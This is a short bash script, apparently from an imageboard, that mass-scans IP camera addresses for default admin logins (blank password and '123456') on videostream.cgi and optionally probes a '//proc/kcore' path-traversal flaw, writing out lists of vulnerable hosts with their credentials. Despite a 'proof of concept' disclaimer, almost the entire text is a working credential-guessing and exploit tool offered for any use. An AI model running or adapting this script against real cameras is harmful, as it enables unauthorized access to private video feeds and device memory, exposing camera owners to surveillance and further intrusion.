FindCams.sh - 8ch.net/ipcam/

#!/bin/bash
#
# By evil @ 8ch.net/ipcam/
#
# This is a proof of concept and is not intended to be used
# to gain unauthorized access to IP camera systems. Otherwise,
# do whatever the fuck you want with it.
#
# Load a list of IPs into a file called iplist.txt
# Use the format http://123.456.789.000:8080 ... one IP per line
#
# ./findcams.sh $ARGUMENT1 $ARGUMENT2 $ARGUMENT3 > $OUT_FILE
#
# $ARGUMENT1 => dokcore | nokcore
#
# $ARGUMENT2 => curl timeout, use 2 for fast and 4+ for long distances
#
# $ARGUMENT3 => out file, list of unpatched kcores
#
# $OUT_FILE => out file, list of default u/p IPs
#
# EXAMPLE 1: Test a list of IPs but do no check for patched kcore
# $ ./findcams.sh nokcore 2 > defaultout.txt
#
# EXAMPLE 2: Test a list of IPs and check for patched kcore
# $ ./findcams.sh dokcore 2 kcorelistout.txt > defaultout.txt
#
# Script will generate a pipe delimited list for each out file
# IP | USER | PASS

IPS="$(< iplist.txt)"
for IP in $IPS; do
    TRY1="$(curl -sL -m $2 -w "%{http_code}" "$IP/videostream.cgi?user=admin&pwd=" -o /dev/null)"
echo $TRY1
if [ "$TRY1" -eq 200 ]
    then
        echo "$IP | admin | nopw"
    else
        TRY2="$(curl -sL -m $2 -w "%{http_code}" "$IP/videostream.cgi?user=admin&pwd=123456" -o /dev/null)"
        if [ "$TRY2" -eq 200 ]
        then
            echo "$IP | admin | 123456"
        else
            if [ "$1" = "dokcore" ]
                then
                TRYKCORE="$(curl -sL -m $2 -w "%{http_code}" "$IP//proc/kcore" -o /dev/null)"
                if [ "$TRYKCORE" -eq 200 ]
                    then
                    echo "$IP | kcore-found" >> $3
                fi
            fi
        fi
   fi
done